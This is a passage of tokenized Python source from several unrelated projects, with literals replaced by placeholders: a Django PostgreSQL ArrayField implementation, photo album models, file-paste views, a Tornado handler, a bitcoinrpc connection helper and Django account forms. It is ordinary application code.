TYPES [ type_key ] <EOL> else : <EOL> self . _type_cast = lambda x : x <EOL> self . _dimension = dimension <EOL> kwargs . setdefault ( "<STR_LIT:blank>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT:null>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT:default>" , None ) <EOL> super ( ArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_db_prep_lookup ( self , lookup_type , value , connection , prepared = False ) : <EOL> if lookup_type == "<STR_LIT>" : <EOL> return [ self . get_prep_value ( value ) ] <EOL> return super ( ArrayField , self ) . get_db_prep_lookup ( lookup_type , value , connection , prepared ) <EOL> def formfield ( self , ** params ) : <EOL> params . setdefault ( "<STR_LIT>" , ArrayFormField ) <EOL> if django . VERSION [ : <NUM_LIT:2> ] >= ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> params . setdefault ( "<STR_LIT>" , forms . TypedMultipleChoiceField ) <EOL> if self . choices : <EOL> params . setdefault ( "<STR_LIT>" , self . get_choices ( include_blank = False ) ) <EOL> params . setdefault ( "<STR_LIT>" , self . _type_cast ) <EOL> return super ( ArrayField , self ) . formfield ( ** params ) <EOL> def get_db_prep_value ( self , value , connection , prepared = False ) : <EOL> value = value if prepared else self . get_prep_value ( value ) <EOL> if not value or isinstance ( value , six . string_types ) : <EOL> return value <EOL> return _cast_to_type ( value , self . _type_cast ) <EOL> def get_prep_value ( self , value ) : <EOL> return value if isinstance ( value , ( six . string_types , list , ) ) or not isinstance ( value , Iterable ) else list ( value ) <EOL> def to_python ( self , value ) : <EOL> return _unserialize ( value ) <EOL> def value_to_string ( self , obj ) : <EOL> value = self . _get_val_from_obj ( obj ) <EOL> return json . dumps ( self . get_prep_value ( value ) , <EOL> cls = DjangoJSONEncoder ) <EOL> def validate ( self , value , model_instance ) : <EOL> if value is None and not self . null : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT:null>' ] ) <EOL> if not self . blank and value in validators . EMPTY_VALUES : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT:blank>' ] ) <EOL> for val in value : <EOL> super ( ArrayField , self ) . validate ( val , model_instance ) <EOL> def deconstruct ( self ) : <EOL> name , path , args , kwargs = super ( ArrayField , self ) . deconstruct ( ) <EOL> if self . _array_type != "<STR_LIT:int>" : <EOL> kwargs [ "<STR_LIT>" ] = self . _array_type <EOL> if self . _dimension != <NUM_LIT:1> : <EOL> kwargs [ "<STR_LIT>" ] = self . _dimension <EOL> if self . _explicit_type_cast : <EOL> kwargs [ "<STR_LIT>" ] = self . _type_cast <EOL> if self . blank : <EOL> kwargs . pop ( "<STR_LIT:blank>" , None ) <EOL> else : <EOL> kwargs [ "<STR_LIT:blank>" ] = self . blank <EOL> if self . null : <EOL> kwargs . pop ( "<STR_LIT:null>" , None ) <EOL> else : <EOL> kwargs [ "<STR_LIT:null>" ] = self . null <EOL> if self . default is None : <EOL> kwargs . pop ( "<STR_LIT:default>" , None ) <EOL> else : <EOL> kwargs [ "<STR_LIT:default>" ] = self . default <EOL> return name , path , args , kwargs <EOL> def db_type ( self , connection ) : <EOL> return "<STR_LIT>" . format ( self . _array_type , "<STR_LIT>" * self . _dimension ) <EOL> def get_transform ( self , name ) : <EOL> transform = super ( ArrayField , self ) . get_transform ( name ) <EOL> if transform : <EOL> return transform <EOL> try : <EOL> index = int ( name ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> index += <NUM_LIT:1> <EOL> return IndexTransformFactory ( index , self ) <EOL> try : <EOL> start , end = name . split ( "<STR_LIT:_>" ) <EOL> start = int ( start ) + <NUM_LIT:1> <EOL> end = int ( end ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> return SliceTransformFactory ( start , end ) <EOL> class IntegerArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT:int>" ) <EOL> super ( IntegerArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class SmallIntegerArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> super ( SmallIntegerArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class BigIntegerArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> super ( BigIntegerArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class TextArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT:text>" ) <EOL> super ( TextArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class FloatArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> super ( FloatArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class DateArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT:date>" ) <EOL> super ( DateArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class DateTimeArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> super ( DateTimeArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class ArrayFormField ( forms . Field ) : <EOL> default_error_messages = { <EOL> "<STR_LIT>" : _ ( "<STR_LIT>" ) , <EOL> } <EOL> def __init__ ( self , max_length = None , min_length = None , delim = None , <EOL> strip = True , * args , ** kwargs ) : <EOL> if delim is not None : <EOL> self . delim = delim <EOL> else : <EOL> self . delim = u"<STR_LIT:U+002C>" <EOL> self . strip = strip <EOL> super ( ArrayFormField , self ) . __init__ ( * args , ** kwargs ) <EOL> def clean ( self , value ) : <EOL> if not value : <EOL> return [ ] <EOL> if isinstance ( value , list ) : <EOL> return value <EOL> try : <EOL> value = value . split ( self . delim ) <EOL> if self . strip : <EOL> value = [ x . strip ( ) for x in value ] <EOL> except Exception : <EOL> raise ValidationError ( self . error_messages [ "<STR_LIT>" ] ) <EOL> return value <EOL> def prepare_value ( self , value ) : <EOL> if isinstance ( value , ( list , tuple ) ) : <EOL> return self . delim . join ( force_text ( v ) for v in value ) <EOL> return super ( ArrayFormField , self ) . prepare_value ( value ) <EOL> def to_python ( self , value ) : <EOL> if value is None or value == u"<STR_LIT>" : <EOL> return [ ] <EOL> return value . split ( self . delim ) <EOL> if django . VERSION [ : <NUM_LIT:2> ] >= ( <NUM_LIT:1> , <NUM_LIT:7> ) : <EOL> from django . db . models import Lookup , Transform <EOL> class ContainsLookup ( Lookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , lhs_params = self . process_lhs ( qn , connection ) <EOL> rhs , rhs_params = self . process_rhs ( qn , connection ) <EOL> params = lhs_params + rhs_params <EOL> var = "<STR_LIT>" % ( lhs , rhs ) , params <EOL> return var <EOL> class ContainedByLookup ( Lookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , lhs_params = self . process_lhs ( qn , connection ) <EOL> rhs , rhs_params = self . process_rhs ( qn , connection ) <EOL> params = lhs_params + rhs_params <EOL> return "<STR_LIT>" % ( lhs , rhs ) , params <EOL> class OverlapLookup ( Lookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , lhs_params = self . process_lhs ( qn , connection ) <EOL> rhs , rhs_params = self . process_rhs ( qn , connection ) <EOL> params = lhs_params + rhs_params <EOL> return "<STR_LIT>" % ( lhs , rhs ) , params <EOL> class ArrayLenTransform ( Transform ) : <EOL> lookup_name = "<STR_LIT>" <EOL> @ property <EOL> def output_type ( self ) : <EOL> return models . IntegerField ( ) <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , params = qn . compile ( self . lhs ) <EOL> return "<STR_LIT>" % lhs , params <EOL> class AnyBaseLookup ( Lookup ) : <EOL> comparator = "<STR_LIT:=>" <EOL> """<STR_LIT>""" <EOL> def as_sql ( self , qn , connection ) : <EOL> """<STR_LIT>""" <EOL> lhs , lhs_params = self . process_lhs ( qn , connection ) <EOL> rhs , rhs_params = self . process_rhs ( qn , connection ) <EOL> params = lhs_params + rhs_params <EOL> table = self . lhs . alias <EOL> pk_name = qn . query . model . _meta . pk . name <EOL> table_dot_pk_name = "<STR_LIT>" % ( table , pk_name ) <EOL> return "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" . format ( table_dot_pk_name = table_dot_pk_name , <EOL> pk_name = pk_name , table = table , <EOL> arrayfield_name = lhs , <EOL> comparator = self . comparator ) % ( <EOL> rhs , ) , params <EOL> class AnyStartswithLookup ( AnyBaseLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> def process_rhs ( self , qn , connection ) : <EOL> wildcarded_rhs_params = [ ] <EOL> rhs , rhs_params = super ( AnyStartswithLookup , self ) . process_rhs ( qn , connection ) <EOL> for param in rhs_params : <EOL> param = "<STR_LIT>" % param <EOL> wildcarded_rhs_params . append ( param ) <EOL> return rhs , wildcarded_rhs_params <EOL> class AnyIStartswithLookup ( AnyStartswithLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> class AnyEndswithLookup ( AnyBaseLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> def process_rhs ( self , qn , connection ) : <EOL> wildcarded_rhs_params = [ ] <EOL> rhs , rhs_params = super ( AnyEndswithLookup , self ) . process_rhs ( qn , connection ) <EOL> for param in rhs_params : <EOL> param = "<STR_LIT>" % param <EOL> wildcarded_rhs_params . append ( param ) <EOL> return rhs , wildcarded_rhs_params <EOL> class AnyIEndswithLookup ( AnyEndswithLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> class AnyContainsLookup ( AnyBaseLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> def process_rhs ( self , qn , connection ) : <EOL> wildcarded_rhs_params = [ ] <EOL> rhs , rhs_params = super ( AnyContainsLookup , self ) . process_rhs ( qn , connection ) <EOL> for param in rhs_params : <EOL> param = "<STR_LIT>" % param <EOL> wildcarded_rhs_params . append ( param ) <EOL> return rhs , wildcarded_rhs_params <EOL> class AnyIContainsLookup ( AnyContainsLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> ArrayField . register_lookup ( ContainedByLookup ) <EOL> ArrayField . register_lookup ( ContainsLookup ) <EOL> ArrayField . register_lookup ( OverlapLookup ) <EOL> ArrayField . register_lookup ( ArrayLenTransform ) <EOL> ArrayField . register_lookup ( AnyStartswithLookup ) <EOL> ArrayField . register_lookup ( AnyIStartswithLookup ) <EOL> ArrayField . register_lookup ( AnyEndswithLookup ) <EOL> ArrayField . register_lookup ( AnyIEndswithLookup ) <EOL> ArrayField . register_lookup ( AnyContainsLookup ) <EOL> ArrayField . register_lookup ( AnyIContainsLookup ) <EOL> class IndexTransform ( Transform ) : <EOL> def __init__ ( self , index , field , * args , ** kwargs ) : <EOL> super ( IndexTransform , self ) . __init__ ( * args , ** kwargs ) <EOL> self . index = index <EOL> self . field = field <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , params = qn . compile ( self . lhs ) <EOL> return "<STR_LIT>" % ( lhs , self . index ) , params <EOL> class SliceTransform ( Transform ) : <EOL> def __init__ ( self , start , end , * args , ** kwargs ) : <EOL> super ( SliceTransform , self ) . __init__ ( * args , ** kwargs ) <EOL> self . start = start <EOL> self . end = end <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , params = qn . compile ( self . lhs ) <EOL> return "<STR_LIT>" % ( lhs , self . start , self . end ) , params <EOL> class IndexTransformFactory ( object ) : <EOL> def __init__ ( self , index , field ) : <EOL> self . index = index <EOL> self . field = field <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> return IndexTransform ( self . index , self . field , * args , ** kwargs ) <EOL> class SliceTransformFactory ( object ) : <EOL> def __init__ ( self , start , end ) : <EOL> self . start = start <EOL> self . end = end <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> return SliceTransform ( self . start , self . end , * args , ** kwargs ) <EOL> try : <EOL> from south . modelsinspector import add_introspection_rules <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ ArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : "<STR_LIT:int>" } ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ TextArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ FloatArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ IntegerArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ BigIntegerArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ SmallIntegerArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ DateTimeArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ DateArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> except ImportError : <EOL> pass </s>
<s> from django . db import models <EOL> from django . conf import settings <EOL> from django . template . defaultfilters import slugify <EOL> from django . contrib . contenttypes import generic <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from niwi . contrib . db . fields import CreationDateTimeField <EOL> from niwi . contrib . db . fields import ModificationDateTimeField <EOL> from niwi . contrib . db . fields import DictField <EOL> from niwi . web . models import slugify_uniquely <EOL> from niwi . photo . image import ImageAdapter <EOL> import datetime , uuid , tempfile , os <EOL> class Album ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> , unique = True ) <EOL> slug = models . SlugField ( max_length = <NUM_LIT:200> , unique = True , db_index = True ) <EOL> owner = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' , null = True , blank = True ) <EOL> created_date = CreationDateTimeField ( editable = True ) <EOL> modified_date = ModificationDateTimeField ( editable = True ) <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( self . name ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , ( ) , { '<STR_LIT>' : self . slug } ) <EOL> class Photo ( models . Model ) : <EOL> album = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> small_description = models . CharField ( max_length = <NUM_LIT> ) <EOL> slug = models . SlugField ( max_length = <NUM_LIT:200> , unique = True , db_index = True ) <EOL> description = models . TextField ( blank = True ) <EOL> exifdata = DictField ( editable = True ) <EOL> original = models . ImageField ( max_length = <NUM_LIT:200> , upload_to = '<STR_LIT>' ) <EOL> large = models . ImageField ( max_length = <NUM_LIT:200> , upload_to = '<STR_LIT>' , <EOL> serialize = False , editable = True , blank = True ) <EOL> medium = models . ImageField ( max_length = <NUM_LIT:200> , upload_to = '<STR_LIT>' , <EOL> serialize = False , editable = True , blank = True ) <EOL> small = models . ImageField ( max_length = <NUM_LIT:200> , upload_to = '<STR_LIT>' , <EOL> serialize = False , editable = True , blank = True ) <EOL> square = models . ImageField ( max_length = <NUM_LIT:200> , upload_to = '<STR_LIT>' , <EOL> serialize = False , editable = True , blank = True , null = True ) <EOL> owner = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' , null = True , blank = True ) <EOL> created_date = CreationDateTimeField ( editable = True ) <EOL> modified_date = ModificationDateTimeField ( editable = True ) <EOL> show_on_home = models . BooleanField ( default = True ) <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( self . small_description ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> if not self . slug : <EOL> self . slug = slugify_uniquely ( self . small_description , self . __class__ ) <EOL> super ( Photo , self ) . save ( * args , ** kwargs ) <EOL> @ property <EOL> def desc_html ( self ) : <EOL> return u"<STR_LIT>" % ( '<STR_LIT>' , self . small_description ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , ( ) , <EOL> { '<STR_LIT>' : self . album . slug , '<STR_LIT>' : self . slug } ) <EOL> def rehash_thumbnails ( self , commit = False ) : <EOL> if self . large and os . path . exists ( self . large . path ) : <EOL> os . remove ( self . large . path ) <EOL> if self . medium and os . path . exists ( self . medium . path ) : <EOL> os . remove ( self . medium . path ) <EOL> if self . small and os . path . exists ( self . small . path ) : <EOL> os . remove ( self . small . path ) <EOL> if self . square and os . path . exists ( self . square . path ) : <EOL> os . remove ( self . square . path ) <EOL> f1 = tempfile . NamedTemporaryFile ( suffix = "<STR_LIT>" , delete = True ) <EOL> self . large = ImageAdapter . resize ( self . original . path , f1 , <NUM_LIT> ) <EOL> f2 = tempfile . NamedTemporaryFile ( suffix = "<STR_LIT>" , delete = True ) <EOL> self . medium = ImageAdapter . resize ( self . original . path , f2 , <NUM_LIT> ) <EOL> f3 = tempfile . NamedTemporaryFile ( suffix = "<STR_LIT>" , delete = True ) <EOL> self . small = ImageAdapter . resize ( self . original . path , f3 , <NUM_LIT> ) <EOL> f4 = tempfile . NamedTemporaryFile ( suffix = "<STR_LIT>" , delete = True ) <EOL> self . square = ImageAdapter . square ( self . original . path , f4 ) <EOL> self . exifdata = ImageAdapter . get_exif_dict ( self . original . path ) <EOL> if commit : <EOL> self . save ( ) </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from django . http import HttpResponse , HttpResponseRedirect <EOL> from django . views . decorators . cache import cache_page <EOL> from django . core . urlresolvers import reverse <EOL> from django . shortcuts import render_to_response , get_object_or_404 <EOL> from niwi . niwi . views . generic import GenericView <EOL> from niwi . niwi_apps . filepaste . models import WebFile <EOL> from niwi . niwi_apps . filepaste . forms import UploadForm , DownloadForm <EOL> import os . path <EOL> class WebFileDownload ( GenericView ) : <EOL> template_name = "<STR_LIT>" <EOL> def get ( self , request , slug ) : <EOL> wfile = get_object_or_404 ( WebFile , slug = slug ) <EOL> if not wfile . password : <EOL> response = HttpResponse ( mimetype = "<STR_LIT>" ) <EOL> response [ '<STR_LIT>' ] = wfile . attached_file . url <EOL> response [ '<STR_LIT>' ] = '<STR_LIT>' % os . path . basename ( wfile . attached_file . name ) <EOL> return response <EOL> form = DownloadForm ( wfile = wfile ) <EOL> return self . render_to_response ( self . template_name , <EOL> { '<STR_LIT>' : form , '<STR_LIT:file>' : wfile } ) <EOL> def post ( self , request , slug ) : <EOL> wfile = get_object_or_404 ( WebFile , slug = slug ) <EOL> form = DownloadForm ( request . POST , wfile = wfile ) <EOL> if form . is_valid ( ) : <EOL> response = HttpResponse ( mimetype = "<STR_LIT>" ) <EOL> response [ '<STR_LIT>' ] = wfile . attached_file . url <EOL> response [ '<STR_LIT>' ] = '<STR_LIT>' % os . path . basename ( wfile . attached_file . name ) <EOL> return response <EOL> return self . render_to_response ( self . template_name , <EOL> { '<STR_LIT>' : form , '<STR_LIT:file>' : wfile } ) <EOL> class WebFileUpload ( GenericView ) : <EOL> template_name = "<STR_LIT>" <EOL> def get ( self , request ) : <EOL> form = UploadForm ( ) <EOL> return self . render_to_response ( self . template_name , { '<STR_LIT>' : form } ) <EOL> def post ( self , request ) : <EOL> form = UploadForm ( request . POST , request . FILES ) <EOL> if form . is_valid ( ) : <EOL> wfile = form . save ( commit = False ) <EOL> if form . cleaned_data [ '<STR_LIT:password>' ] : <EOL> wfile . set_password ( form . cleaned_data [ '<STR_LIT:password>' ] ) <EOL> wfile . save ( ) <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> return self . render_to_response ( self . template_name , { '<STR_LIT>' : form } ) </s>
<s> import tornado . web <EOL> class BaseHandler ( tornado . web . RequestHandler ) : <EOL> @ property <EOL> def db ( self ) : <EOL> return self . application . db <EOL> @ property <EOL> def session ( self ) : <EOL> return self . application . session_engine <EOL> def on_finish ( self ) : <EOL> if self . session and self . session . is_modified : <EOL> self . session . save ( ) <EOL> super ( BaseHandler , self ) . on_finish ( ) </s>
<s> import os , sys <EOL> class Params : <EOL> homepage = '<STR_LIT>' <EOL> cache = '<STR_LIT>' <EOL> credentials = '<STR_LIT>' <EOL> refreshurl = '<STR_LIT>' <EOL> refreshLabel = '<STR_LIT>' <EOL> refreshAtBottom = False <EOL> alink = "<STR_LIT>" <EOL> vlink = "<STR_LIT>" <EOL> link = "<STR_LIT>" <EOL> bgcolor = "<STR_LIT>" <EOL> text = "<STR_LIT>" <EOL> font = "<STR_LIT>" <EOL> cols = <NUM_LIT:4> <EOL> tags = '<STR_LIT>' <EOL> caseSensitive = False <EOL> title = '<STR_LIT>' <EOL> titleColor = "<STR_LIT>" <EOL> addDatestampCopy = True <EOL> verbose = True <EOL> def SetCredentials ( self , username , password ) : <EOL> self . username = username <EOL> self . password = password </s>
<s> """<STR_LIT:U+0020>""" <EOL> from __future__ import absolute_import <EOL> __version__ = '<STR_LIT>' <EOL> from . sempervirens import * </s>
<s> import bitcoinrpc <EOL> def get_connection ( node ) : <EOL> return bitcoinrpc . connect_to_remote ( <EOL> node . rpcuser_decrypted , <EOL> node . rpcpass_decrypted , <EOL> host = node . rpchost , <EOL> port = node . rpcport , <EOL> use_https = node . rpchttps , <EOL> ) </s>
<s> from parsley . decorators import parsleyfy <EOL> from django import forms <EOL> from django . contrib . auth import get_user_model <EOL> from django . forms . formsets import BaseFormSet <EOL> from django . contrib . auth . forms import UserCreationForm , UserChangeForm <EOL> from django . contrib . auth . tokens import default_token_generator <EOL> from django . contrib . sites . models import Site <EOL> from django . contrib . sites . shortcuts import get_current_site <EOL> from django . template import loader <EOL> from django . utils . encoding import force_bytes <EOL> from django . utils . http import urlsafe_base64_encode <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from connect . accounts . models import CustomUser , Role , Skill , UserSkill <EOL> from connect . accounts . utils import ( <EOL> get_user , invite_user_to_reactivate_account , validate_email_availability <EOL> ) <EOL> User = get_user_model ( ) <EOL> @ parsleyfy <EOL> class CustomPasswordResetForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> email = forms . EmailField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> max_length = <NUM_LIT> , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> def save ( self , domain_override = None , <EOL> subject_template_name = '<STR_LIT>' , <EOL> email_template_name = '<STR_LIT>' , <EOL> use_https = False , token_generator = default_token_generator , <EOL> from_email = None , request = None , html_email_template_name = None ) : <EOL> """<STR_LIT>""" <EOL> from django . core . mail import send_mail <EOL> email = self . cleaned_data [ "<STR_LIT:email>" ] <EOL> active_users = User . _default_manager . filter ( <EOL> email__iexact = email , is_active = True ) <EOL> for user in active_users : <EOL> if not user . has_usable_password ( ) : <EOL> continue <EOL> if not domain_override : <EOL> site = get_current_site ( request ) <EOL> domain = site . domain <EOL> else : <EOL> site = Site ( name = domain_override , <EOL> domain = domain_override ) <EOL> domain = site . domain <EOL> context = { <EOL> '<STR_LIT:email>' : user . email , <EOL> '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : site , <EOL> '<STR_LIT>' : urlsafe_base64_encode ( force_bytes ( user . pk ) ) , <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT>' : token_generator . make_token ( user ) , <EOL> '<STR_LIT>' : '<STR_LIT>' if use_https else '<STR_LIT:http>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> subject = loader . render_to_string ( subject_template_name , context ) <EOL> subject = '<STR_LIT>' . join ( subject . splitlines ( ) ) <EOL> email = loader . render_to_string ( email_template_name , context ) <EOL> if html_email_template_name : <EOL> html_email = loader . render_to_string ( html_email_template_name , <EOL> context ) <EOL> else : <EOL> html_email = None <EOL> send_mail ( subject , email , from_email , <EOL> [ user . email ] , html_message = html_email ) <EOL> class CustomUserCreationForm ( UserCreationForm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CustomUserCreationForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if '<STR_LIT:username>' in self . fields : <EOL> del self . fields [ '<STR_LIT:username>' ] <EOL> class Meta : <EOL> model = CustomUser <EOL> fields = ( "<STR_LIT:email>" , ) <EOL> class CustomUserChangeForm ( UserChangeForm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CustomUserChangeForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if '<STR_LIT:username>' in self . fields : <EOL> del self . fields [ '<STR_LIT:username>' ] <EOL> class Meta : <EOL> model = CustomUser <EOL> fields = ( "<STR_LIT:email>" , ) <EOL> @ parsleyfy <EOL> class RequestInvitationForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . request = kwargs . pop ( '<STR_LIT>' , None ) <EOL> super ( RequestInvitationForm , self ) . __init__ ( * args , ** kwargs ) <EOL> full_name = forms . CharField ( <EOL> max_length = <NUM_LIT:30> , <EOL> error_messages = { '<STR_LIT>' : _ ( '<STR_LIT>' ) } <EOL> ) <EOL> email = forms . EmailField ( <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> comments = forms . CharField ( <EOL> widget = forms . Textarea ( attrs = { '<STR_LIT>' : _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> } <EOL> ) <EOL> def clean_email ( self ) : <EOL> """<STR_LIT>""" <EOL> email = self . cleaned_data [ '<STR_LIT:email>' ] <EOL> user = get_user ( email ) <EOL> if user : <EOL> if user . is_closed : <EOL> invite_user_to_reactivate_account ( user , request = self . request ) <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> else : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> return email <EOL> @ parsleyfy <EOL> class ActivateAccountForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' , None ) <EOL> super ( ActivateAccountForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( <EOL> initial = self . user . full_name , <EOL> error_messages = { <EOL> 